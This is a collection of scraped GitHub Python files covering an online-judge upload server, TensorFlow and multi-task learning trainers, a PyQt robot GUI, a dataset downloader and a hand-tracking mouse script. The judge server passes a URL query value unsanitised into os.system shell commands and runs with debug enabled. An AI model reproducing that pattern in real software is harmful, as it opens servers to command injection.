+ simp_name + '.txt' + ' ' + './upload/' + simp_name + '.txt')\n    os.system('mv ./problems/' + problem_id + '/' + simp_name + '.txt' + ' ' + './upload/' + simp_name + '.txt')\n\n@route('/upload/command')\ndef command():\n\tglobal value \n\tvalue=request.query.value\n\n@route('/upload', method='POST')\ndef do_upload():\n    filedata = request.files.get('fileField')\n    simp_name = ''.join(random.sample(string.ascii_letters + string.digits, 10))\n    save_name = simp_name + '.cpp'\n#    print(value)\n    if filedata.file:\n        file_name = os.path.join(upload_path, save_name)\n        try:\n            filedata.save(file_name) # write the uploaded file to disk\n        except IOError:\n            return '上传文件失败'\n        print(save_name)\n        problem_id = value\n        judge(simp_name, problem_id)\n        return ' 上传文件成功, 文件名: {}'.format(site + '/upload/' + save_name) + '评测结果:{}'.format(site + '/upload/' + simp_name + '.txt')\n\n##        return '上传文件成功, 文件名: {}'.format(file_name)\n    else:\n        return '上传文件失败'\n\n@route('/upload/')\ndef show_code(file_name):\n    print(file_name)\n    return static_file(file_name, './upload/')\n\n\n\n    \n@error(404)\ndef error404(error):\n    return '404 发生页面错误, 未找到内容'\n\n\nrun(host='0.0.0.0', port=80, debug=True)\n\n","repo_name":"AKteamNG/SimOJ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
{"seq_id":"2267014973","text":"import tensorflow as tf\n\nfrom . import util\n\ndef my_estimator(output_dir, throttle_secs, nnsize, batch_size, train_steps, eval_steps, eval_delay_secs, nembeds):\n    \n    run_config = tf.estimator.RunConfig(save_checkpoints_secs=throttle_secs,\n                                        tf_random_seed=2810,\n                                        keep_checkpoint_max=3)\n    \n    # Add custom evaluation metric\n    def my_rmse(labels, predictions):\n        pred_values = tf.squeeze(input=predictions[\"predictions\"], axis=-1)\n        return {\"rmse\": tf.compat.v1.metrics.root_mean_squared_error(labels=labels, predictions=pred_values)}\n    \n    # Feature engineering\n    wide, deep = util.get_wide_deep(nembeds)\n    \n    estimator = tf.estimator.DNNLinearCombinedRegressor(\n        model_dir=output_dir,\n        linear_feature_columns=wide,\n        dnn_feature_columns=deep,\n        dnn_hidden_units=nnsize,\n        dnn_activation_fn=tf.nn.leaky_relu,\n        batch_norm=True,\n        dnn_dropout=0.2,\n        config=run_config)\n    \n    estimator = tf.contrib.estimator.add_metrics(estimator=estimator, metric_fn=my_rmse)\n    \n    train_spec = tf.estimator.TrainSpec(\n        input_fn=util.read_dataset('train', tf.estimator.ModeKeys.TRAIN, batch_size),\n        max_steps=train_steps)\n    \n    exporter = tf.estimator.LatestExporter('exporter', serving_input_receiver_fn=util.serving_input_receiver_fn)\n    \n    eval_spec = tf.estimator.EvalSpec(\n        input_fn=util.read_dataset('test', tf.estimator.ModeKeys.EVAL, 2**15),\n        steps=eval_steps,\n        start_delay_secs=eval_delay_secs, # start evaluating after N seconds\n        throttle_secs=throttle_secs, # evaluate every N seconds\n        exporters=exporter)\n    \n    return estimator, train_spec, eval_spec\n    ","repo_name":"DivLoic/event-driven-ml","sub_path":"edml-trainer/trainer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
{"seq_id":"6749122560","text":"# 1. Given a list of numbers. Print the elements of the original list whose values are greater than the previous element. 
Use comprehension.\n# in\n# 9\n\n# out\n# [15, 16, 2, 3, 1, 7, 5, 4, 10]\n# [16, 3, 7, 10]\n\n# in\n# 10\n\n# out\n# [28, 20, 10, 5, 1, 24, 7, 15, 23, 25]\n# [24, 15, 23, 25]\n\nfrom random import sample\n\ndef find_el(num):\n    cur_list = sample(range(1, (num+1)*2), k=num)\n    print(cur_list)\n\n    new_list = [cur_list[i+1] for i in range(num-1) if cur_list[i+1] > cur_list[i]]\n    print(new_list)\n\n\n\nfind_el(int(input('Введите количество: ')))","repo_name":"AlbinaKhuade/Python_lessons","sub_path":"Lesson_6/Homework/hw_6-1.py","file_name":"hw_6-1.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"72689629922","text":"from data.db_session import global_init, create_session\nfrom data.users import User\n\n\ndef module_1(bd_name):\n    global_init(bd_name)\n    db_sess = create_session()\n    lst = db_sess.query(User).filter(User.address == 'module_1', User.speciality.notlike('%engineer%'),\n                                     User.position.notlike('%engineer%')).all()\n    for i in lst:\n        print(i.id)\n\n\nmodule_1(input())\n","repo_name":"Ononim03/flask","sub_path":"zaprosy/zapros2.py","file_name":"zapros2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"36083607595","text":"\nimport sys\nimport serial\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom data_handler import data_in\nfrom helpful import int_to_bin_str\nfrom comm_packet import packet\n\nimport time\nimport threading\ndef task1(data_in, num_its):\n\tprint(\"inside 1\")\n\tprint(\"idx: {} num_its: {}\".format(data_in.data_idx, num_its))\n\n\twhile(data_in.data_idx < num_its):\n\t\tdata_in.read()\n\t\ttime.sleep(0.002)\n\t\tprint(data_in.data_idx)\n\tdata_in.to_csv()\n\tprint(\"wrote to csv\")\n\nclass UI(QWidget):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.curr_pack = packet()\n\t\tgrid = QGridLayout()\n\t\tself.setLayout(grid)\n\n\t\t#data handler stuff\n\t\tself.data_sock = data_in(0)\n\t\tprint(\"open\")\n\t\tlabel = QLabel(\"Swarm Control GUI\")\n\t\theader = QHBoxLayout()\n\t\theader.addWidget(label)\n\t\tlabel.setAlignment(Qt.AlignCenter)\n\t\tgrid.addLayout(header, 0, 0, 1, 1)\n\n\t\t# self.csv_name = QGroupBox(\"csv name\")\n\n\t\t# grid.addLayout(csv_name_box, 0, 1, 1, 1)\n\n\t\tcmd_group = QGroupBox(\"commands\")\n\t\tcmd_grid = QGridLayout()\n\t\tID_edit = QLineEdit()\n\t\tID_edit.setPlaceholderText(\"Robot ID \")\n\t\tID_edit.returnPressed.connect(self.set_mach_id)\n\t\tcmd_grid.addWidget(ID_edit, 0,0, 1, 2)\n\t\tstart_btn = QPushButton(\"start\",self)\n\t\tstop_btn = QPushButton(\"stop\",self)\n\n\t\tself.enable_btns = [start_btn, stop_btn]\n\t\tstart_btn.clicked[bool].connect(self.enable)\n\t\tstop_btn.clicked[bool].connect(self.enable)\n\n\n\t\tcmd_grid.addWidget(start_btn, 1,0, 1, 1)\n\t\tcmd_grid.addWidget(stop_btn, 1, 1, 1, 1)\n\t\t\n\n\t\tself.ID_edit = ID_edit\n\t\tself.policy_combo_box = QComboBox()\n\t\t# self.policy_combo_box.setPlaceholderText(\"set policy\")\n\t\tfor i in range(pow(2,5)):\n\t\t\tself.policy_combo_box.addItem(int_to_bin_str(i, 5))\n\t\tcmd_grid.addWidget(self.policy_combo_box,2, 0, 1, 2)\n\t\tsend_pol_btn = QPushButton(\"send policy\")\n\t\tsend_pol_btn.clicked[bool].connect(self.upload_pol)\n\n\t\tcmd_grid.addWidget(send_pol_btn,3, 1, 1, 1)\n\t\tdisp_info_btn = QPushButton(\"disp info\")\n\t\tcmd_grid.addWidget(disp_info_btn,3, 0, 1, 
1)\n\t\tcmd_group.setLayout(cmd_grid)\n\t\tgrid.addWidget(cmd_group, 1,0,1,1)\n\n\t\ttrail_group = QGroupBox(\"data collect\")\n\t\ttrail_group_grid = QGridLayout()\n\n\t\tcsv_name_edit = QLineEdit()\n\t\tcsv_name_edit.setPlaceholderText(\"CSV Name \")\n\t\tcsv_name_box = QHBoxLayout()\n\t\tcsv_name_box.addWidget(csv_name_edit)\n\t\tcsv_name_edit.returnPressed.connect(self.csv_rename)\n\t\tself.csv_name_edit = csv_name_edit\n\t\ttrail_group_grid.addWidget(self.csv_name_edit, 0,0,1,2)\n\t\t\n\t\tbegin_trial_btn = QPushButton(\"begin\")\n\t\tend_trial_btn = QPushButton(\"end\")\n\t\tself.idx_counter = QLabel(\"data idx: {}\".format(self.data_sock.data_idx))\n\n\t\tbegin_trial_btn.clicked[bool].connect(self.begin_trial)\n\t\tself.csv_num_el_edit = QLineEdit()\n\t\tself.csv_num_el_edit.setPlaceholderText(\"input # enteries\")\n\t\tself.csv_num_el_edit.returnPressed.connect(self.num_el_edit)\n\t\tself.num_els = 100\n\n\t\ttrail_group_grid.addWidget(begin_trial_btn, 1,0,1,1)\n\t\ttrail_group_grid.addWidget(end_trial_btn, 2,0,1,1)\n\t\ttrail_group_grid.addWidget(self.csv_num_el_edit, 1, 1, 1, 1)\n\t\ttrail_group_grid.addWidget(self.idx_counter,2, 1, 1,1)\n\t\ttrail_group.setLayout(trail_group_grid)\n\t\tgrid.addWidget(trail_group, 0,1,2,1)\n\n\t\tself.info_disp = QLabel(\"info:\")\n\t\tgrid.addWidget(self.info_disp, 3,0,1,2)\n\n\t\t# self.line_edit = QLineEdit()\n\t\t# enter_line = QPushButton(\"Enter\",self)\n\t\t# enter_line.clicked[bool].connect(self.transmit)\n\t\t# self.line_edit.returnPressed.connect(self.transmit)\n\t\t# liney = QHBoxLayout()\n\t\t# liney.addWidget(self.line_edit)\n\t\t# liney.addWidget(enter_line)\n\t\t# self.line_edit.setPlaceholderText(\"ex: ID CMD\")\n\t\t# grid.addLayout(liney, 1, 0, 1, 1)\n\n\t\tself.setWindowTitle('Swarm Interface')\n\t\tself.resize(500, 250)\n\t\tself.center()\n\t\tself.show()\n\n\tdef set_mach_id(self):\n\t\tself.curr_pack.set_mach_id(self.ID_edit.text())\n\t\tself.ID_edit.setPlaceholderText(self.ID_edit.text())\n\t\tself.info_disp.setText(\"curr bot: {}\".format(self.ID_edit.text()))\n\t\tself.ID_edit.setText(\"\")\n\n\tdef enable(self):\n\t\tsource = self.sender()\n\t\tself.curr_pack.set_cmd(\"enable\")\n\t\tif (source == self.enable_btns[0]):\n\t\t\tself.curr_pack.set_info(1)\n\t\t\ttxt = \"on\"\n\t\telif (source == self.enable_btns[1]):\n\t\t\tself.curr_pack.set_info(0)\n\t\t\ttxt = \"off\"\n\t\tself.data_sock.write_packet(self.curr_pack)\n\t\tself.info_disp.setText(\"turning bot {} {}\".format(self.curr_pack.mach_id, txt))\n\n\tdef upload_pol(self):\n\t\tprint(self.policy_combo_box.currentText())\n\t\tself.curr_pack.set_info(self.policy_combo_box.currentText())\n\t\tself.curr_pack.set_cmd(\"set_pol\")\n\t\tself.data_sock.write_packet(self.curr_pack)\n\n\tdef center(self):\n\t\tqr = self.frameGeometry()\n\t\t#print(qr)\n\t\tcp = QDesktopWidget().availableGeometry().center()\n\t\t#print(cp)\n\t\tqr.moveCenter(cp)\n\t\tself.move(qr.topLeft())\n\n\tdef csv_rename(self):\n\t\tself.data_sock.set_csv_name(self.csv_name_edit.text())\n\t\tself.csv_name_edit.setPlaceholderText(self.csv_name_edit.text())\n\t\tself.csv_name_edit.setText(\"\")\n\n\tdef begin_trial(self):\n\t\tself.data_sock.data_idx = 0\n\t\tser_read = threading.Thread(target=task1, args=[self.data_sock, self.num_els])\n\t\tser_read.start()\n\t\t# while(self.data_sock.data_idx < self.num_els):\n\t\t# \tprint(self.data_sock.data_idx)\n\t\t# \tself.data_sock.read()\n\t\t# \tself.idx_counter.setText(\"data idx: {}\".format(self.data_sock.data_idx))\n\n\t\t# self.data_sock.to_csv()\n\n\tdef 
num_el_edit(self):\n\t\tself.num_els = int(self.csv_num_el_edit.text())\n\t\tself.csv_num_el_edit.setPlaceholderText(str(self.num_els))\n\t\tself.csv_num_el_edit.setText(\"\")\n\t\tself.idx_counter.setText(\"data idx: {}/{}\".format(self.data_sock.data_idx, self.num_els))\n\nif __name__ == '__main__':\n\n\tapp = QApplication(sys.argv)\n\tex = UI()\n\t# ex.data_sock.ser.close()\n\tsys.exit(app.exec_())","repo_name":"JCohner/swarm_platform","sub_path":"interface/hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"}
{"seq_id":"29790521997","text":"\"\"\"\nDownloads files from https://figshare.com/authors/Kamal_Choudhary/4445539\n\"\"\"\n\nimport zipfile, os, requests\nfrom jarvis.db.jsonutils import loadjson\n\ndef datasets(dataset=''):\n    if dataset == 'dft_2d':\n        url = \"https://ndownloader.figshare.com/files/22471019\"\n        js_tag = 'jdft_2d-4-26-2020.json'\n        print ('Downloading 2D dataset ...')\n    elif dataset == 'dft_3d':\n        url = \"https://ndownloader.figshare.com/files/22471022\"\n        js_tag = 'jdft_3d-4-26-2020.json' \n        print ('Downloading 3D dataset ...')\n\n    elif dataset == 'cfid_3d':\n        url = \"https://ndownloader.figshare.com/files/22470818\"\n        js_tag = 'jml_3d-4-26-2020.json' \n        print ('Downloading 3D CFID dataset ...')\n    else:\n        # raise here; otherwise url and js_tag are unbound below\n        raise ValueError('Dataset does not exist', dataset)\n    return url, js_tag\n\n    \n\ndef data(dataset='dft_2d') :\n    url, js_tag = datasets(dataset)\n    path = str(os.path.join(os.path.dirname(__file__),js_tag ))\n    if not os.path.isfile(path):\n        zfile = str(os.path.join(os.path.dirname(__file__), \"tmp.zip\"))\n        r = requests.get(url)\n        f = open(zfile, \"wb\")\n        f.write(r.content)\n        f.close()\n\n        with zipfile.ZipFile(zfile, 'r') as zipObj:\n            #zipObj.extract(path)\n            zipObj.extractall(os.path.join(os.path.dirname(__file__)))\n        os.remove(zfile)\n    data = loadjson(path)\n    return data\n\n\n\n\ndef get_ff_eneleast():\n    jff1 = str(os.path.join(os.path.dirname(__file__), \"jff1.json\"))\n    if not os.path.isfile(jff1):\n        r = requests.get(\"https://ndownloader.figshare.com/files/10307139\")\n        f = open(jff1, \"wb\")\n        f.write(r.content)\n        f.close()\n    data_ff1 = loadjson(jff1)\n    return data_ff1\n\n\n\n\"\"\"\nif __name__ == \"__main__\":\n\n    data_2d = data(dataset='dft_2d')\n    print('2d',len(data_2d))\n    data_3d = data(dataset='dft_3d')\n    print('3d',len(data_3d))\n    data_ml = data(dataset='cfid_3d')\n    print('cfid3d',len(data_ml))\n    data_ff = get_ff_eneleast()\n    print ('ff',len(data_ff))\n\"\"\"\n","repo_name":"knc6/jarvis-tools","sub_path":"jarvis/db/figshare.py","file_name":"figshare.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"3469547251","text":"import autopy\nfrom HandTracking import HandTracking\nimport cv2\nimport numpy as np\nimport time \n\ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\nwCam = 1280\nhCam = 720\nrectangle = 200\nsmooth = 12\n\npTime = 0\nplocX, plocY = 0, 0\nclocX, clocY = 0, 0\n\ncap.set(3, wCam)\ncap.set(4, hCam)\ncount = 0\nhand = HandTracking(hands=1, detect_conf=0.7)\nwScr, hScr = autopy.screen.size()\nwhile True:\n    success, img = cap.read()\n    img = cv2.flip(img, 1)\n    img = hand.detect_hand(img)\n    lm_list = hand.get_positions(img)\n    if lm_list:\n        \n        x1, y1 = lm_list[8][1:3]\n        x2, y2 = lm_list[12][1:3]\n        fingers = hand.fingers_up(img, lm_list)\n        if fingers[1] == 1 and fingers[2] == 0:\n            count = 0\n            # Convert Coordinates\n            x3 = np.interp(x1, (rectangle, 
wCam - rectangle), (0, wScr))\n y3 = np.interp(y1, (rectangle, hCam - rectangle), (0, hScr))\n # Smooth Values\n clocX = plocX + (x3 - plocX) / smooth\n clocY = plocY + (y3 - plocY) / smooth\n\n # Move q\n autopy.mouse.move(clocX, clocY)\n cv2.circle(img, (x1, y1), 15, (0, 255, 0), cv2.FILLED)\n plocX, plocY = clocX, clocY\n elif fingers[1] == 1 and fingers[2] == 1 and fingers[3] == 1:\n print(fingers)\n cv2.putText(img, 'Quitting', (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (0, 255, 0), 3)\n count += 1\n if count >= 60:\n break\n elif fingers[0] == 0 and fingers[1] == 1 and fingers[2] == 1:\n print(fingers)\n count = 0\n index = np.array(lm_list[8][1:3])\n middle = np.array(lm_list[12][1:3])\n distance = np.sqrt(np.sum((index - middle) ** 2))\n if distance < 40:\n cv2.circle(img, (x1, y1), 15, (0, 0, 255), cv2.FILLED)\n autopy.mouse.click()\n\n cv2.imshow('Image', img)\n if cv2.waitKey(1) == ord('q'):\n break","repo_name":"IvanYingX/Game_Vision","sub_path":"mouse_move.py","file_name":"mouse_move.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14880481524","text":"import argparse\nfrom audioop import mul\n\nimport torch.optim as optim\nimport torch.utils.data.sampler as sampler\n\nfrom auto_lambda import AutoLambda\nfrom create_network import *\nfrom create_dataset import *\nfrom utils import *\nimport problems\n\nimport betty\nfrom betty.configs import Config, EngineConfig\nfrom betty.engine import Engine\n\nfrom datetime import datetime\n\nparser = argparse.ArgumentParser(description='Multi-task/Auxiliary Learning: CIFAR-100')\nparser.add_argument('--mode', default='none', type=str)\nparser.add_argument('--port', default='none', type=str)\n\nparser.add_argument('--weight', default='equal', type=str, help='multi-task weighting: equal, dwa, uncert, autol')\nparser.add_argument('--gpu', default=0, type=int, help='gpu ID')\nparser.add_argument('--autol_init', default=0.1, type=float, help='initialisation for auto-lambda')\nparser.add_argument('--autol_lr', default=3e-4, type=float, help='learning rate for auto-lambda')\nparser.add_argument('--subset_id', default=0, type=int, help='domain id for cifar-100, -1 for MTL mode')\nparser.add_argument('--seed', default=0, type=int, help='random seed ID')\n\nopt = parser.parse_args()\n\ntorch.manual_seed(opt.seed)\nnp.random.seed(opt.seed)\nrandom.seed(opt.seed)\n\n# create logging folder to store training weights and losses\nif not os.path.exists('logging'):\n os.makedirs('logging')\ntime_str = datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n\n# define model, optimiser and scheduler\ndevice = torch.device(\"cuda:{}\".format(opt.gpu) if torch.cuda.is_available() else \"cpu\")\nmodel = MTLVGG16(num_tasks=20).to(device)\ntrain_tasks = {'class_{}'.format(i): 5 for i in range(20)}\npri_tasks = {'class_{}'.format(opt.subset_id): 5} if opt.subset_id >= 0 else train_tasks\n\ntotal_epoch = 200\n\nif opt.weight == 'autol':\n params = model.parameters()\n meta_weight_ls = np.zeros([total_epoch, len(train_tasks)], dtype=np.float32)\n\nelif opt.weight in ['dwa', 'equal']:\n T = 2.0 # temperature used in dwa\n lambda_weight = np.ones([total_epoch, len(train_tasks)], dtype=np.float32)\n params = model.parameters()\n\nelif opt.weight == 'uncert':\n logsigma = torch.tensor([-0.7] * len(train_tasks), requires_grad=True, device=device)\n params = list(model.parameters()) + [logsigma]\n logsigma_ls = np.zeros([total_epoch, len(train_tasks)], 
dtype=np.float32)\n\noptimizer = optim.SGD(params, lr=0.1, weight_decay=5e-4, momentum=0.9)\nscheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, total_epoch)\n\n\n# define dataset\ntrans_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.5071, 0.4867, 0.4408], [0.2675, 0.2565, 0.2761]),\n])\n\ntrans_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.5071, 0.4867, 0.4408], [0.2675, 0.2565, 0.2761]),\n])\n\ntrain_sets = CIFAR100Multiclass(root='dataset', train=True, transform=trans_train)\nif opt.subset_id == -1:\n test_sets = CIFAR100Multiclass(root='dataset', train=False, transform=trans_test)\nelse:\n test_sets = CIFAR100MTL(root='dataset', train=False, transform=trans_test, subset_id=opt.subset_id)\n\nbatch_size = 32\n\ntrain_loaders = torch.utils.data.DataLoader(dataset=train_sets, batch_size=batch_size, shuffle=True, num_workers=2)\n \n\n# a copy of train_loader with different data order, used for Auto-Lambda meta-update\nif opt.weight == 'autol':\n val_loaders = torch.utils.data.DataLoader(dataset=train_sets, batch_size=batch_size, shuffle=True, num_workers=2)\n\ntest_loaders = torch.utils.data.DataLoader(dataset=test_sets, batch_size=batch_size, shuffle=False, num_workers=2)\n\n\n# Train and evaluate multi-task network\nif opt.subset_id >= 0:\n print('CIFAR-100 | Training Task: All Domains | Primary Task: {} in Multi-task / Auxiliary Learning Mode with VGG-16'\n .format(test_sets.subset_class.title()))\nelse:\n print('CIFAR-100 | Training Task: All Domains | Primary Task: All Domains in Multi-task / Auxiliary Learning Mode with VGG16')\n\nprint('Applying Multi-task Methods: Weighting-based: {}'\n .format(opt.weight.title()))\n\ntrain_batch = len(train_loaders)\ntest_batch = len(test_loaders)\n\ntrain_metric = TaskMetric(train_tasks, pri_tasks, batch_size, total_epoch, 'cifar100')\nif opt.subset_id >= 0:\n test_metric = TaskMetric(train_tasks, pri_tasks, batch_size, total_epoch, 'cifar100')\nelse:\n test_metric = TaskMetric(train_tasks, pri_tasks, batch_size, total_epoch, 'cifar100', include_mtl=True)\n\nif opt.weight == 'autol':\n multitask_config = Config(type='darts', unroll_steps=1)\n reweight_config = Config(type='darts', unroll_steps=1, retain_graph=True)\n\n # lower level task\n multitask = problems.Multitask(\n name='multitask',\n module=model,\n optimizer=optimizer,\n train_data_loader=train_loaders,\n config=multitask_config,\n device=device,\n train_metric=train_metric\n )\n\n # loss weighting linear layer\n meta_module = nn.Linear(len(train_tasks), 1, bias=False, device=device)\n meta_module.weight.data.fill_(opt.autol_init)\n\n meta_optimizer = optim.Adam(meta_module.parameters(), lr=opt.autol_lr)\n\n # upper level task\n auto_lambda = problems.Reweight(\n name='auto_lambda',\n config=reweight_config,\n train_tasks=train_tasks,\n pri_tasks=pri_tasks,\n device=device,\n optimizer=meta_optimizer,\n module=meta_module,\n train_data_loader=val_loaders\n )\n\n engine_config = EngineConfig(\n train_iters=train_batch * total_epoch,\n valid_step=train_batch\n )\n\n u2l = {auto_lambda: [multitask]}\n l2u = {multitask: [auto_lambda]}\n dependencies = {'u2l': u2l, 'l2u': l2u}\n problems = [auto_lambda, multitask]\n\n class AutoLambdaEngine(Engine):\n def __init__(self, config, problems, scheduler_epoch, dependencies=None, env=None):\n super().__init__(config, problems, dependencies, env)\n # workaround to perform scheduler step once per epoch 
instead of every batch\n self.scheduler_epoch = scheduler_epoch\n def validation(self):\n self.scheduler_epoch.step()\n epoch = test_metric.epoch_counter\n train_str = self.multitask.train_metric.compute_metric(only_pri=True)\n self.multitask.train_metric.reset()\n\n # evaluating test data\n with torch.no_grad():\n if opt.subset_id >= 0:\n test_dataset = iter(test_loaders)\n for _ in range(test_batch):\n test_data, test_target = test_dataset.next()\n test_data = test_data.to(device)\n test_target = test_target.to(device)\n\n test_pred = self.multitask(test_data, opt.subset_id)\n test_loss = F.cross_entropy(test_pred, test_target)\n\n test_metric.update_metric([test_pred], {'class_{}'.format(opt.subset_id): test_target}, [test_loss])\n else:\n test_datasets = iter(test_loaders)\n for _ in range(test_batch):\n test_datas, test_targets = test_datasets.next()\n test_datas = [x.to(device) for x in test_datas]\n test_targets = {k: y.to(device) for k, y in test_targets.items()}\n\n test_pred = [self.multitask(test_data, t) for t, test_data in enumerate(test_datas)]\n test_loss = [compute_loss(test_pred[t], test_targets[task_id], task_id) for t, task_id in enumerate(test_targets)]\n\n test_metric.update_metric(test_pred, test_targets, test_loss)\n\n test_str = test_metric.compute_metric(only_pri=True)\n test_metric.reset()\n if opt.subset_id >= 0:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: {} {:.4f}'\n .format(epoch, train_str, test_str, test_sets.subset_class.title(),\n test_metric.get_best_performance('class_{}'.format(opt.subset_id))))\n else:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: All {:.4f}'\n .format(epoch, train_str, test_str, test_metric.get_best_performance('all')))\n\n meta_weight_ls[epoch] = self.auto_lambda.module.weight.data.detach().cpu()\n dict = {'train_loss': train_metric.metric, 'test_loss': test_metric.metric,\n 'weight': meta_weight_ls}\n\n class_names = train_sets.sets[0].class_dict.keys()\n print(get_weight_str_ranked(meta_weight_ls[epoch], list(class_names), 4))\n np.save('logging/mtl_cifar_{}_{}_{}_betty_{}.npy'.format(\n opt.subset_id, opt.weight, opt.seed, time_str\n ), dict)\n \n engine = AutoLambdaEngine(\n config=engine_config,\n problems=problems,\n dependencies=dependencies,\n scheduler_epoch=scheduler\n )\n\n engine.run()\n \nelse:\n for index in range(total_epoch):\n\n # apply Dynamic Weight Average\n if opt.weight == 'dwa':\n if index == 0 or index == 1:\n lambda_weight[index, :] = 1.0\n else:\n w = []\n for i, t in enumerate(train_tasks):\n w += [train_metric.metric[t][index - 1, 0] / train_metric.metric[t][index - 2, 0]]\n w = torch.softmax(torch.tensor(w) / T, dim=0)\n lambda_weight[index] = len(train_tasks) * w.numpy()\n\n # evaluating train data\n model.train()\n train_datasets = iter(train_loaders)\n for k in range(train_batch):\n train_datas, train_targets = next(train_datasets)\n train_datas = [x.to(device) for x in train_datas]\n train_targets = {k: y.to(device) for k, y in train_targets.items()}\n\n optimizer.zero_grad()\n\n train_pred = [model(train_data, t) for t, train_data in enumerate(train_datas)]\n train_loss = [compute_loss(train_pred[t], train_targets[task_id], task_id) for t, task_id in enumerate(train_targets)]\n\n if opt.weight in ['equal', 'dwa']:\n loss = sum(w * train_loss[i] for i, w in enumerate(lambda_weight[index]))\n\n if opt.weight == 'uncert':\n loss = sum(1 / (2 * torch.exp(w)) * train_loss[i] + w / 2 for i, w in enumerate(logsigma))\n\n loss.backward()\n optimizer.step()\n\n 
train_metric.update_metric(train_pred, train_targets, train_loss)\n\n train_str = train_metric.compute_metric(only_pri=True)\n train_metric.reset()\n\n # evaluating test data\n model.eval()\n with torch.no_grad():\n test_dataset = iter(test_loaders)\n if opt.subset_id >= 0:\n for k in range(test_batch):\n test_data, test_target = test_dataset.next()\n test_data = test_data.to(device)\n test_target = test_target.to(device)\n\n test_pred = model(test_data, opt.subset_id)\n test_loss = F.cross_entropy(test_pred, test_target)\n\n test_metric.update_metric([test_pred], {'class_{}'.format(opt.subset_id): test_target}, [test_loss])\n else:\n for k in range(test_batch):\n test_datas, test_targets = test_dataset.next()\n test_datas = [x.to(device) for x in test_datas]\n test_targets = {k: y.to(device) for k, y in test_targets.items()}\n\n test_pred = [model(test_data, t) for t, test_data in enumerate(test_datas)]\n test_loss = [compute_loss(test_pred[t], test_targets[task_id], task_id) for t, task_id in enumerate(test_targets)]\n test_metric.update_metric(test_pred, test_targets, test_loss)\n\n test_str = test_metric.compute_metric(only_pri=True)\n test_metric.reset()\n\n scheduler.step()\n class_names = train_sets.sets[0].class_dict.keys()\n\n if opt.subset_id >= 0:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: {} {:.4f}'\n .format(index, train_str, test_str, test_sets.subset_class.title(),\n test_metric.get_best_performance('class_{}'.format(opt.subset_id))))\n else:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: All {:.4f}'\n .format(index, train_str, test_str, test_metric.get_best_performance('all')))\n\n if opt.weight in ['dwa', 'equal']:\n dict = {'train_loss': train_metric.metric, 'test_loss': test_metric.metric,\n 'weight': lambda_weight}\n print(get_weight_str_ranked(lambda_weight[index], list(class_names), 4))\n\n if opt.weight == 'uncert':\n logsigma_ls[index] = logsigma.detach().cpu()\n dict = {'train_loss': train_metric.metric, 'test_loss': test_metric.metric,\n 'weight': logsigma_ls}\n print(get_weight_str_ranked(1 / (2 * np.exp(logsigma_ls[index])), list(class_names), 4))\n\n np.save('logging/mtl_cifar_{}_{}_{}_betty_{}.npy'.format(\n opt.subset_id, opt.weight, opt.seed, time_str\n ), dict)\n","repo_name":"pm3512/auto-lambda-betty","sub_path":"trainer_cifar_betty.py","file_name":"trainer_cifar_betty.py","file_ext":"py","file_size_in_byte":13255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31614011190","text":"import sys\nsys.path.append(\"../Modules\")\n\nfrom HPIB_plot import*\n\n\ndef getpd(df, trace):\n return df[trace][df[trace].columns[0]].to_numpy()\n\npath=\"C:/Users/Zucchi-Note/Dropbox/Cryochip/Medidas/TN2/231026/IdxVgs-231026 200848.csv\"\npath2=\"C:/Users/Zucchi/Documents/Medidas/teste/231028/csv/IdxVds-231028 144521.csv\"\n\ndf=pd.read_csv(path, header=[0, 1])\n\n\nVG=getpd(df, 'VG')\nID=getpd(df, 'ID')\n\nif 'gm' not in df.columns:\n gm=(np.diff(getpd(df,'ID').T)/np.diff(getpd(df,'VG').T)).T\n gm=np.append([gm[0]], gm)\n gm=[format(x, '.6e') for x in gm]\n\n header=pd.MultiIndex.from_product([['gm'],\n df['VG'].columns])\n\n df2=pd.DataFrame(data=gm, columns=header)\n df=pd.concat((df, df2), axis=1)\n\n df.to_csv(path, index=False, float_format='%.6e')\nelse:\n gm=getpd(df, 'gm')\n\nif 'dgm' not in df.columns:\n dgm=(np.diff(getpd(df,'gm').T)/np.diff(getpd(df,'VG').T)).T\n dgm=np.append(dgm, [dgm[-1]])\n dgm=[format(x, '.6e') for x in dgm]\n\n header=pd.MultiIndex.from_product([['dgm'],\n 
